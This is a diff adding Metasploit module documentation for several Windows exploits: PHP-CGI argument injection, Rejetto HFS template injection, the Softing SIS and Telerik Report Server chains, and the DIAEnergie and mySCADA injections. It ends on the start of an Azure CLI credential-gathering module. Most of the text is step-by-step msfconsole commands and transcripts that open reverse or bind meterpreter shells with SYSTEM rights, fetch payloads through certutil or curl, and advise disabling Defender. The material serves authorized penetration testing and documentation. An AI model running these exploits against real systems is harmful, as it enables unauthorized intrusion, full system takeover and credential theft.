+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > sessions -i 1
+[*] Starting interaction with 1...
+meterpreter > sysinfo
+Computer        : DESKTOP-Q0HUOEI
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/window
+```
@@ -0,0 +1,200 @@
+## Vulnerable Application
+This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations
+on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
+the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
+character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose
+the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
+and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.
+
+XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target
+an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.
+
+## Testing
+* Configure a Windows system with a system locale for Japanese (code page 932).
+  * Navigate to `Control Panel` -> `Region` -> `Administrative` -> `Change system locale...`
+  * Select `Japanese (Japan)` and click `OK`.
+  * Click `Restart now`.
+  * After restart, login and open a command prompt. Verify the code page via the command `chcp`. You should see this:
+```
+Microsoft Windows [Version 10.0.20348.1607]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Users\Administrator>chcp
+Active code page: 932
+```
+* Download a known vulnerable version of XAMPP `8.2.12 / PHP 8.2.12`
+([direct link here](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe)).
+* Install XAMPP and run the XAMPP Console. Click the `Start` action to start the Apache web server.
+* Verify you can browse to http://127.0.0.1:80/. You should see the "Welcome to XAMPP for Windows" page.
+
+No further configuration is needed to exploit the target when targeting the exploits default `TARGETURI` endpoint
+`/php-cgi/php-cgi.exe'`. This is because XAMPP uses the Apache `ScriptAlias` directive to expose the `php-cgi.exe`
+binary directly. If you want to target an `.php` endpoint (for example `/index.php`), the target Apache serer must
+have this enabled in its configuration (`c:\xampp\apache\conf\extra\httpd-xampp.conf`):
+
+```
+ #
+ # PHP-CGI setup
+ #
+ <FilesMatch "\.php$">
+     SetHandler application/x-httpd-php-cgi
+ </FilesMatch>
+ <IfModule actions_module>
+     Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
+ </IfModule>
+```
+
+If you modify the Apache config, dont forget to restart the Apache server to pick up the changes.
+
+## Verification Steps
+Note: On Windows, disable Defender if you are using the command payloads. This is not needed for the PHP payloads
+as they execute in-memory.
+
+1. Start msfconsole
+2. `use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set payload php/meterpreter/reverse_tcp`
+6. `set LHOST eth0`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Windows PHP
+
+```
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set RHOSTS 192.168.86.50
+RHOSTS => 192.168.86.50
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set target 0
+target => 0
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
+
+Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80                    yes       The target port (TCP)
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+[*] Sending stage (39927 bytes) to 192.168.86.50
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49761) at 2024-06-10 17:32:52 +0100
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > pwd
+C:\xampp\php
+meterpreter > sysinfo
+Computer    : WIN-V28QNSO2H05
+OS          : Windows NT WIN-V28QNSO2H05 10.0 build 20348 (Windows Server 2022) AMD64
+Meterpreter : php/windows
+meterpreter > 
+```
+
+### Windows Command
+
+```
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set target 1
+target => 1
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
+
+Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.50         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80                    yes       The target port (TCP)
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /php-cgi/php-cgi.exe  yes       The path to a PHP CGI endpoint
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ZyJgsNjYvpTX     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > check
+[+] 192.168.86.50:80 - The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
+[*] Sending stage (201798 bytes) to 192.168.86.50
+[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:49780) at 2024-06-10 17:34:45 +0100
+
+meterpreter > getuid
+Server username: WIN-V28QNSO2H05\Administrator
+meterpreter > pwd
+C:\xampp\php
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : ja_JP
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to a unauthenticated server side template
+injection (SSTI) vulnerability. An remote unauthenticated attacker can execute code with the privileges
+of the user account running the HFS.exe server process. This exploit has been tested to work against version
+2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers
+and no patch is available. Users are recommended to upgrade to version 3.x.
+
+## Testing
+[Download](https://github.com/rejetto/hfs2/releases/download/v2.4-rc06/hfs.exe) a vulnerable version of HTTP
+File Server (HFS). To run this server, simply execute the HFS.exe binary. By default the server will listen for
+HTTP connections on port 80.
+
+The exploit has been tested against versions:
+* 2.4.0 RC7
+* 2.3m
+
+## Verification Steps
+Note: On Windows, disable Defender if you are using the default payloads.
+
+1. Start msfconsole
+2. `use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set payload cmd/windows/http/x64/meterpreter_reverse_http`
+5. `set LHOST eth0`
+6. `set LPORT 4444`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Automatic
+
+```
+msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.86.35
+RHOSTS => 192.168.86.35
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set payload cmd/windows/http/x64/meterpreter_reverse_http
+payload => cmd/windows/http/x64/meterpreter_reverse_http
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > show options
+
+Module options (exploit/windows/http/rejetto_hfs_rce_cve_2024_23692):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.35    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI                   yes       The base path to the web application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter_reverse_http):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                           no        Comma-separate list of extensions to load
+   EXTINIT                              no        Initialization strings for extensions
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      gnwWBKQz         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The local listener hostname
+   LPORT               4444             yes       The local listener port
+   LURI                                 no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
+[+] 192.168.86.35:80 - The target is vulnerable. Rejetto HFS version 2.4.0 RC7
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit 
+
+[*] Started HTTP reverse handler on http://192.168.86.42:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Redirecting stageless connection from /pBzS1uPGeqRa91v1PJaNDwwtxXK-KTpGms8g with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Attaching orphaned/stageless session...
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.35:31348) at 2024-06-06 16:38:33 +0100
+
+meterpreter > getuid
+Server username: testing-vm\user
+meterpreter > sysinfo
+Computer        : TESTING-VM
+OS              : Windows 11 (10.0 Build 22631).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -0,0 +1,115 @@
+## Description
+
+This module chains 2 vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.
+
+This was demonstrated by Steven Seeley and Chris Anastasio of Incite Team as part of Pwn2Own Miami 2022.
+
+In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll. This causes the file C:\\Windows\\System32\\wbem\\wbemcomn.dll to be created and executed upon touching the disk.
+
+In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.
+
+The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication. When using asignature, any provided password is ignored. To use passwords again, `unset SIGNATURE`.
+
+A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. The DLL must be compiled with the correct exports, which can be found in "external/source/exploits/CVE-2022-2334/template.def". It is assumed that the operator has compiled the DLL correctly for the exploit, if a custom DLL is specified.
+
+## Vulnerable Application
+
+This module was tested against version 1.22, installed on Windows Server 2019 Standard x64. Older versions of the vulnerable application are no longer available for download.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Start `msfconsole`
+2. Do: `use exploit/windows/http/softing_sis_rce`
+3. Do: `set RHOSTS <target_ip>`
+4. Do: Optional: `set SSL true` if necessary
+5. Do: Optional: `set RPORT <target_port>` if SSL is set
+6. Do: `set USERNAME <username>` if necessary. Default is `admin`
+7. Do: `set PASSWORD <password>` if necessary. Default is `admin`
+8. Do: Optional: `set SIGNATURE <signature>` to use signature authentication. `PASSWORD` will be ignored if `SIGNATURE` is set!
+9. Do: Optional: `set DLLPATH <path_to_custom_dll>` to use a custom DLL. It is assumed that the DLL is correctly compiled by the operator for the exploit.
+10. Do: `exploit` and get a shell
+11. Do: Recommended: delete `C:\\Windows\\System32\\wbem\\wbemcomn.dll` 
+
+## Scenarios
+### Default options
+
+```
+msf6 > use exploit/windows/http/softing_sis_rce
+[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 exploit(windows/http/softing_sis_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.254:4444
+[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
+[+] 192.168.50.119:8099 - Valid credentials provided
+[*] Generating payload DLL...
+[*] Created /home/kali/.msf4/local/wbemcomn.dll
+[*] Saving configuration...
+[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
+[*] Sending stage (201798 bytes) to 192.168.50.119
+[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
+[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
+[*] Meterpreter session 1 opened (192.168.50.254:4444 -> 192.168.50.119:50525) at 2024-04-11 19:52:35 +0800
+[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Using a signature
+```
+msf6 > use exploit/windows/http/softing_sis_rce
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 exploit(windows/http/softing_sis_rce) > set SIGNATURE f7f623f3d40764a03da6c3379919b964
+SIGNATURE => f7f623f3d40764a03da6c3379919b964
+msf6 exploit(windows/http/softing_sis_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.254:4444
+[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
+[*] 192.168.50.119:8099 - Authenticating as user admin with signature f7f623f3d40764a03da6c3379919b964...
+[+] 192.168.50.119:8099 - Signature f7f623f3d40764a03da6c3379919b964 is valid for user admin
+[*] Generating payload DLL...
+[*] Created /home/kali/.msf4/local/wbemcomn.dll
+[*] 192.168.50.119:8099 - Saving configuration...
+[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
+[*] Sending stage (201798 bytes) to 192.168.50.119
+[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
+[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
+[*] Meterpreter session 4 opened (192.168.50.254:4444 -> 192.168.50.119:50618) at 2024-04-11 20:00:11 +0800
+[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Using a custom DLL
+```
+msf6 > use exploit/windows/http/softing_sis_rce
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 exploit(windows/http/softing_sis_rce) > set DLLPATH /home/kali/Documents/softing/wbemcomn.dll
+DLLPATH => /home/kali/Documents/softing/wbemcomn.dll
+msf6 exploit(windows/http/softing_sis_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.254:4444
+[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
+[+] 192.168.50.119:8099 - Valid credentials provided
+[*] 192.168.50.119:8099 - Saving configuration...
+[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
+[*] Sending stage (201798 bytes) to 192.168.50.119
+[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
+[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
+[*] Meterpreter session 5 opened (192.168.50.254:4444 -> 192.168.50.119:50696) at 2024-04-11 20:03:43 +0800
+[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
@@ -0,0 +1,77 @@
+## Vulnerable Application
+This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability
+(CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.
+The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.
+The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a
+new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an
+OS command as NT AUTHORITY\SYSTEM. The module will automatically delete the created report but not the account
+because users are unable to delete themselves.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/windows/http/telerik_report_server_deserialization`
+1. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+1. Do: `run`
+
+## Options
+
+### USERNAME
+Username for the existing account. A new account with random username will be used unless specified.
+
+### PASSWORD
+Password for the account. If a new account is created, then a random value wil be used unless specified. If an
+existing account is used, the password will be used as-is.
+
+## Scenarios
+
+### Telerik Report Server 8.0.22.225 on Windows Server 2022
+
+```
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set RHOSTS 192.168.159.27
+RHOSTS => 192.168.159.27
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set VERBOSE true
+VERBOSE => true
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/bind_tcp
+PAYLOAD => cmd/windows/powershell/meterpreter/bind_tcp
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > check
+
+[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] 192.168.159.27:83 - The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > run
+
+[*] Powershell command length: 4211
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+[*] Creating a new administrator account using CVE-2024-4358
+[+] Created account: benny:g7RkmoaboNexvOKh (Note: This account will not be deleted by the module)
+[+] Successfully authenticated as benny
+[*] Using category: SamplesX
+[*] Created report: tD8xpobpBn
+[+] The server responded with an error indicating that the payload was executed
+[*] Started bind TCP handler against 192.168.159.27:4444
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[*] Sending stage (176198 bytes) to 192.168.159.27
+[*] Meterpreter session 1 opened (192.168.250.134:46613 -> 192.168.159.27:4444) at 2024-06-06 14:37:18 -0400
+[*] Deleting report 'tD8xpobpBn' (ID: 64897ea2acf)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : SRV-DOM
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : labs1collabu0
+Logged On Users : 14
+Meterpreter     : x86/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter > 
+```
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a SQL injection vulnerability in DIAEnergie <= v8.28.0 (CVE-2024-4548).
+
+An unauthenticated remote attacker can exploit this vulnerability to inject an arbitrary script through a SQL injection vulnerability, which
+can then be executed in the context of `NT AUTHORITY\SYSTEM`. The vulnerability is within the CEBC service, which listens by default on TCP
+port 928. It accepts various user-controlled data, including `RecalculateHDMWYC` messages, which are insufficiently validated before using
+them as part of a SQL query.
+
+Versions <= 1.10.1.8610 are affected. Tenable published [TRA-2024-13](https://www.tenable.com/security/research/tra-2024-13) to cover the
+security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://downloadcenter.deltaww.com/downloadCenterCounter.aspx?DID=39969&DocPath=1&hl=en-US).
+For the product to work correctly, SQL Server (e.g., SQL Server Express) needs to be installed.
+
+**Successfully tested on**
+
+- DIAEnergie v1.10 on Windows 10 22H2
+- DIAEnergie v1.9 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the SQL Server (Express)
+2. Install DIAEnergie
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/scada/diaenergie_sqli
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/scada/diaenergie_sqli) > set RHOSTS <IP>
+msf6 exploit(windows/scada/diaenergie_sqli) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against DIAEnergie v1.10 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/scada/diaenergie_sqli) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.241:4444 
+[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.245:928 - The target appears to be vulnerable.
+[*] 192.168.1.245:928 - Sending SQL injection...
+[*] 192.168.1.245:928 - Triggering script execution...
+[*] 192.168.1.245:928 - Cleaning up database...
+[+] 192.168.1.245:928 - Script successfully injected, check thy shell.
+[*] Sending stage (201798 bytes) to 192.168.1.245
+[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400
+
+meterpreter > shell
+Process 6392 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4529]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt authority\system
+```
@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384).
+
+An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
+`NT AUTHORITY\SYSTEM`.
+This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue.
+
+Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover
+the security issues. The official changelog for the updated version, v8.29.0, is available
+[here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a
+"General security improvement" without further details.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe).
+For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface
+(navigate to System > Storage).
+
+**Successfully tested on**
+
+- mySCADA MyPRO 8.28.0 on Windows 10 22H2
+- mySCADA MyPRO 8.27.0 on Windows 10 22H2
+- mySCADA MyPRO 8.26.0 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the application
+2. Configure the project and log paths (System > Storage in the web interface, running by default on TCP ports 80 & 443)
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/scada/mypro_cmdexe
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP>
+msf6 exploit(windows/scada/mypro_cmdexe) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Options
+### USERNAME
+
+The username of a MyPRO user (default: admin)
+
+### PASSWORD
+
+The associated password of the MyPRO user (default: admin)
+
+## Scenarios
+
+Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/scada/mypro_cmdexe) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.241:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Checking credentials...
+[+] Credentials are working.
+[*] Sending command injection...
+[*] Sending stage (201798 bytes) to 192.168.1.239
+[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
+[*] Exploit finished, check thy shell.
+
+meterpreter > shell
+Process 2632 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4651]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt authority\system
+```
@@ -0,0 +1,187 @@
+## Vulnerable Application
+
+Any windows, linux, or osx system with a `meterpreter` session and
+
+[Azure CLI 2.0+](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest).
+
+Successfully tested on:
+
+* Azure CLI 2.0.33 on Windows Server 2012 R2, and Windows 10
+* azure-cli 2.0.33-1.el7 on openSUSE Tumbleweed 20180517
+* Azure CLI 2.61.0 on Windows 10
+* Azure CLI 2.35.0 on [Docker](https://github.com/rapid7/metasploit-framework/pull/10113#issuecomment-2191464809)
+
+## Verification Steps
+
+1. Install Azure CLI
+2. Start msfconsole
+3. Get a `meterpreter` session on some host.
+4. Do: `use post/multi/gather/azure_cli_creds`
+5. Do: `set SESSION [SESSION_ID]`
+6. Do: `run`
+7. If the system has readable configuration files for Azure CLI, they will stored in loot and a summary will be printed to the screen.
+
+## Options
+
+## Scenarios
+
+### A new install of 2.0.33 (empty data files) on Windows 10
+
+```
+[msf](Jobs:0 Agents:1) post(multi/gather/azure_cli_creds) > run
+
+[*] az cli version: 2.0.33
